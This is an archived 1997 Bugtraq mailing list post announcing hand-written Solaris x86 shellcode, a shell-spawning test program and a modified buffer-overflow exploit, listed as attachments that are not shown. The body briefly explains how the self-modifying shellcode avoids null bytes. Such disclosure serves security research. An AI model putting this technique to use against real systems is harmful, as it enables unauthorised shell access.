Bugtraq mailing list archives
Solaris x86 buffer overflows
From: jfb11 () MICRO-NET COM (jim bresler)
Date: Thu, 12 Jun 1997 08:49:26 -0400
Hi, attached is the "shellcode" for Solaris x86 I wrote yesterday. This includes the code I assembled (it will core dump when run directly, because it is self-modifying), a test program that should spawn a shell, and a modified version of Aleph One's exploit3.c.

Note that most buffer overflows are self-modifying in one part; this changes itself in two parts. Because a long call is used and registers cannot be used as arguments, the arguments to the lcall should be ignored. To avoid the need to leave a null character in at run time, the arguments are changed at run-time.

Jim <jfb11 () micro-net com>

Attachments: solarisx86_shellcode.s, test_sc.c, exploit3.c